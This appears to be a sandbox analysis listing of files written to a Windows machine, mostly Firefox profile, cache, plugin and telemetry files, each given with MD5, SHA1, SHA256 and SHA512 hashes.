C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\prefs.js
| MD5 | 49e0d1cd2f860d3be1fba7263ba59907 |
| SHA1 | a68e26318993c94791373542d9b496069eca9c89 |
| SHA256 | 7ce7aded2df7d5428d28c4c5b0210678fe6ff36d3cc685c51d41eccf10ce7c03 |
| SHA512 | 483e9620ccc444289ea7911eef035e94c4b08f3fb9ee2ab9b28ee980fdd9d64467077fd107b353ac8f5b0727f97b73e3085def6f35a4e46dc522f4d97dd40aed |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\42vejdix.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\prefs-1.js
| MD5 | 678decbd46ed14a903625e6528f85231 |
| SHA1 | a6536a74871a02b7c7e27cab9a40156729629dfa |
| SHA256 | 9643c2a87489c03c77a10ce91ff2006be2e5a31a88ef563843af36879cd7c644 |
| SHA512 | dcf941c20c6efd738b382e57d61aba1fa453b6f4284437c64516a982c43be3f787251b696f63fa7b286795fb1e7dc213de817fbeab04da9033b9b583954e6239 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\42vejdix.default-release\startupCache\webext.sc.lz4
| MD5 | 4670fc058803eeb6eb7ea559229597a2 |
| SHA1 | 97e1ba261d6d0017a78d893b15f1e631e400fcbe |
| SHA256 | e7094b58f2830217d217fb58ff12e2cc2ccf837956d29c1cb56f3eb3d95496ef |
| SHA512 | e60e7171da69e4487f905b7dc670a62709245d2bbd7dc0ff135a816b898798a7c8e397426c3ce90ec858d0f3261b136ef935a4cfc9df7c353a093295ad851944 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 17ac1a4ec6f95f17715a36c4c23742fe |
| SHA1 | 16bd7ba23ac5f4c78f300c681740c0254d012dea |
| SHA256 | 39400eb603971f09a05f94290afb7c6b873d2cf8299152c635257bdc1c3b8f84 |
| SHA512 | 2d9e3589cfb46d29e1432e72d5282d3ee4e7407cab07e744439d002a325192caab4e0894642bc5708b4c74c00633a5dca1e960521fa32b6dfc7b2e879bd2447f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 80a89ed30ea8cc953f16f347765ed807 |
| SHA1 | b462cb5a6cae6370909fcfade394bef3b90413e0 |
| SHA256 | 443110c287f4181537837bbe898ce04eda11eb44e217dab27e2a371108bec7e7 |
| SHA512 | 06f7a8b38ab8feb60ed0dee68034fc1c2f8f0f88a493e02c48bba17d2012ef8a6caaac1298c3048995c8c70dd634a1cfd45436dc763a074148876b9c34c1420c |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\42vejdix.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984
| MD5 | 75606e28ea71fc87c3e1fcde52eeae70 |
| SHA1 | 239be96529ad890f8c3e5873b870a4bcf4ebd1b4 |
| SHA256 | d07f4cc9df3d8a70619091e3e72a9654750d44b3ec1f2444c55f87287d125c3f |
| SHA512 | 9e1d3b4aa0684d38bad6992166d5e37f4170db95d86077dc16c516951ed460c5233fef975f612ab37f61b7678c1b5afb4309a52cf643a5d08f48e8a62012c0d7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\AlternateServices.bin
| MD5 | 064f9ddf1b4185b1d27990221885e18c |
| SHA1 | 406e898633ba5bbfb2e11b63e32631d575f89dc0 |
| SHA256 | a66b12f0c6d87f0c787b9d4140fac4347da8af369d75e4e3bb115f753b1b8905 |
| SHA512 | 027bb3de99ed4da30c84226d95021244888083a9cda88541e05b05c1a1aace1928c5e16e4e6f5f4f31f06bba405c5dc4f48ddd208a76e9f83d980d12c46991cf |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\prefs-1.js
| MD5 | 5d9ed76dcb9c3bf3c4a8d07068454c89 |
| SHA1 | 01a4c3c6e4dce17c52836f62f5b912da7283496c |
| SHA256 | f6ee725281ab35c0230068677a2dc011e42bc2fbc666b01a8809459e6b8ab728 |
| SHA512 | e4ff82fbaeebbe7d78e2a75047e80b510418b748664f4bf302efdba4873b72bef053a356f8362824daafc410d441d188f4c06a9bf6380ee119a828912eeb4154 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 56265e0033a11f9854a2ada8573711db |
| SHA1 | 8e07b2f0cd2bb95c9480439531df35064f5f9c44 |
| SHA256 | a80c3474e26675a89b1760215cd4a2998ded378490e4c1c19a2a9fada45fc46a |
| SHA512 | 369f66e05e4432baf525b23046752cfd2bd0e060f94690c8f394da601b9a751a192644dcb219545800f39071c080dc064044f5f1972e25303be04780262fe7f4 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 5a5a62fed7b6e6b61fb3d2d0789119a8 |
| SHA1 | abfcbfe561694e9ab14482152d01d7fd57b86617 |
| SHA256 | 9263375e83d2149ef51c2a8e18cda9f9ff3be3911b3e70e04996b8a360457136 |
| SHA512 | ffe4543d2624d9d8fd1fb4d8fa8d97403b6997cd05e059eb5534b102f3a780d64c4222a9d1006cb7039e6978555a9d37f8251df8cbc4ceacab25e1d1d5fb13d9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | c53c6aaad93d5010873241a9ce2b3601 |
| SHA1 | ba224155df081e8e56a7a8eddf8d0230c6e14f9c |
| SHA256 | eda79a8c02cffc5c246f2ebb6e4a56d0a2b0b82fed0eea6ec8098ff35e35e96e |
| SHA512 | 48f2aeed981dee741379956b6cef62cdaa242d19abdebfbae311676f051f1b3af71f9a662872b503b37d6ea589db4938101a105a0e2da900dcd19a7deed4cd1a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | c5d213902dec25fd71f85fe8a4cd34e4 |
| SHA1 | dbe677a441013540d35b48996ffd078e018b124b |
| SHA256 | b886f71ba06dd79ffcb4c7a91da86b2f416a42961e239b73897f505a72dc9f08 |
| SHA512 | c203939c567195bf708382855e2f348def4596f3b2b62eb132f5c7216ad54b93ef5a531e150cf8953277fa9d39d57ae9d50e73b079c6300a685ab343d7fdfe63 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 7a542c006bd4f0110a6780127b7f1646 |
| SHA1 | 5e61f848a99bdf58325a1142f6788c018ef1f78a |
| SHA256 | b42ca7d8f9817ca226a89a204ae5b4f13ef82427bc8ac2f78c4e8f458bfe630f |
| SHA512 | fda2dc33b1feb3044af8e2ad2f380dfe382a1c1163290dcc9082a80f9d2c114a5257b93bc5db83bc91318ffdd63f0c140dfbee89662521ac110b6ca2be0587f3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | d13ddc8b82203939aa6fcc194bfacecb |
| SHA1 | b70ad7751dcb7291e0eef392f5edaf1d7927132d |
| SHA256 | 7cebffc0167db9fa87b32cb15bc40a93bc76478809c2bfab518337fc49d6053d |
| SHA512 | 9c58c3aa9db6809b01d61f342d8e0db904e575aa44f33e4c9183a44b742eacf090bec904fbc2b4b0d721779c2283f0ac611bb0fb55bfd81b403391092279e377 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | eb703e06c175f36ac87747c7f607f46a |
| SHA1 | f92d667cc50097b2da43b4370ceea7d3cb4bd8ee |
| SHA256 | 53a5574008d3f84d6408628f97c92afd90c9d0bd1c3047b7916562536714e04c |
| SHA512 | 170b4591c024771aa9ad8ed26671754f8c393f6072840552472162bc096b4ed4f19e0276c6dc741e1611bb863d2a787135fb51a27a97eb7cbcb3674d4b269e9b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_600_POS4.jpg
| MD5 | 655d9f0cf81ffe21abba5cf876043e25 |
| SHA1 | 6b2d8c5f9a422a97330a46de3189a2aff082525a |
| SHA256 | 1e101a054ba3cf6edabc59936ef9a395ee11453d0403af5c46db5e726cdaaf43 |
| SHA512 | f402acada9bfecc60f957212cb83e289e59cb2b854196cc5427093703bf9a869d84895c9f98f8e3700764e92c74b661ba6d0a43e6f6111e00d5ff25873791384 |